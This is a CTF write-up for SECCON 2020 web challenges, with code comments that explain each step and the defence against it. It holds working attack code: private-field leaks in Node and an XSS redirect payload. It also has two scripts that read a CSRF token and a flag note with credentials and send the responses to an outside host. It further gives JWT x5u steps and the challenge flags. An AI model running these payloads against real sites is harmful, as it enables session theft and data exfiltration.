SECCON 2020 - Web
// Mirrors the shape of TypeScript's `__classPrivateFieldSet` helper (WeakMap-backed
// `#private` fields, presumably — confirm against the challenge's compiled output) with
// one addition: after storing the value it also reads and prints the WeakMap entry that
// belongs to the `flag` instance resolved from the enclosing scope (`flag` is not a
// parameter). Defensive takeaway: private state kept in a shared WeakMap is only as
// private as the helper that guards it — any code that can redefine this helper can read
// every instance's field, so helpers like this must not be overridable by untrusted code.
var __classPrivateFieldSet = function (receiver, privateMap, value) {
  const isRegistered = privateMap.has(receiver);
  if (!isRegistered) {
    throw new TypeError("attempted to set private field on non-instance");
  }
  privateMap.set(receiver, value);
  // Deliberate side channel: every write also prints another instance's private value.
  const leaked = privateMap.get(flag);
  console.log(leaked);
  return value;
};
// Instantiating the class presumably routes the constructor's private-field write through
// the overridden helper above, which is what triggers the logging — confirm against the
// challenge's Flag class.
new Flag("1234")
// SECCON{Player_WorldOfFantasy_StereoWorXxX_CapsLock_WaveRunner} |
const util = require('util');
const inspector = require('inspector');

// Open an in-process inspector session. The inspector protocol can enumerate `#private`
// fields for debugging, which is how the value is read below. Defensive takeaway: once
// code can reach the inspector (or require('inspector')), `#private` gives no secrecy.
const session = new inspector.Session();
session.connect();

// Make `flag` reachable from the inspector's evaluation scope under the name `aa`.
// In a CommonJS module `this` is `module.exports`, so this writes onto Object.prototype,
// which the global object inherits from — presumably the reason for the indirection; confirm.
this.__proto__.aa = flag;

const onProperties = (error, { privateProperties }) => {
  console.log('private properties', privateProperties);
};

const onEvaluate = (error, { result }) => {
  console.log(result);
  // `result.objectId` is the remote handle; Runtime.getProperties returns its privateProperties.
  session.post('Runtime.getProperties', { objectId: result.objectId }, onProperties);
};

session.post('Runtime.evaluate', { expression: `aa;` }, onEvaluate);
// SECCON{HighCollarGirl_CutieCinem@Replay_PhonyPhonic_S.F.SoundFurniture} |
# index.html (for reporting) | |
<script>
// Reporting page: sends the challenge bot to note.php with a payload in the `_` parameter.
// The `..;/` segment and the `a onerror=` fragment suggest a path-normalisation mismatch
// plus reflection of `_` into a tag attribute, with `$.getScript` (presumably jQuery)
// pulling a remote script — confirm against the challenge source. Application-side
// mitigations: attribute-encode reflected parameters and serve a CSP that forbids script
// from other origins.
location.href="https://milk-revenge.chal.seccon.jp/note.php/..;/note.php?id=5f820da700115b0700127762&_=a%20onerror=$.getScript(%27https://lab.mashiro.kr/bb.js%27);";
</script>
# aa.js | |
// Stage 1 (loaded on the challenge origin by the reporting page): a credentialed GET
// (withCredentials) to the API's csrf-token endpoint whose response body is forwarded to a
// third-party origin by a second request. Reading the cross-origin response presumably
// depends on the API's CORS policy allowing this origin with credentials — confirm.
// Defensive takeaway: a CSRF token that injected script can fetch and read offers no
// protection once XSS exists; the fix belongs on the XSS side (output encoding, CSP).
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/csrf-token?_=aaaaaaaaaaaaaaaaaaaaaaaaaaaa');xhr.send();
# bb.js | |
// Stage 2: same shape as aa.js, but the credentialed GET now carries the token obtained in
// stage 1 as a query parameter to read the flag note, and forwards the response body.
// NOTE(review): the token is a page-specific value captured during the CTF. Tokens in query
// strings also end up in server logs and Referer headers, which real APIs should avoid.
var xhr = new XMLHttpRequest();xhr.onreadystatechange = function() {if (xhr.readyState === xhr.DONE) {let xhr2 = new XMLHttpRequest();xhr2.open('GET', 'https://lab.mashiro.kr/?c='+xhr.responseText);xhr2.send();};};xhr.withCredentials=true;xhr.open('GET', 'https://milk-revenge-api.chal.seccon.jp/notes/flag?token=c5fe8848-9278-404f-9dfe-2ede7f41077c');xhr.send();
milk: SECCON{I_am_heavily_concerning_about_unintended_sols_so_I_dont_put_any_spoiler_here_but_anyway_congrats!} | |
milk revenge: SECCON{Okay_there_was_actually_unintended_solution_as_I_intended_blahblah} |
1. Make a JWT and sign it with any private key
2. Change the x5u URL to point at the server below (app.py) while it is running
3. get flag: SECCON{1_w0uLd_L1K3_70_347_r4M3N_1N5734d_0f_p4574} | |
# app.py | |
from flask import Flask

# One-shot toggle read and flipped by aa(): True after the certificate has been
# served once, False again after the following request.
c: bool = False
app = Flask(__name__)
@app.route("/root.crt")
def aa():
    """Serve root.crt on every other request.

    First request (c is False): flip c to True and return the file contents.
    Next request (c is True): flip c back to False and fall through without a
    return, so Flask receives None from the view and answers with an error
    instead of the certificate. The write-up's step 2 points the token's x5u
    at this endpoint, so two consecutive fetches presumably see different
    results — confirm against the challenge's verification code.
    """
    global c
    if c == False:
        c = True
        with open("root.crt") as f:
            q = f.read()
        return q
    else:
        c = False
        # NOTE(review): Python 2 print statement; under Python 3 this line is a
        # SyntaxError and would need print("hello").
        print "hello"
if __name__ == "__main__":
    # NOTE(review): debug=True on a 0.0.0.0 bind exposes the Werkzeug interactive
    # debugger to anyone who can reach port 2368 — acceptable for a throwaway CTF
    # helper, but disable it before leaving the server running.
    app.run(host="0.0.0.0", port=2368, debug=True)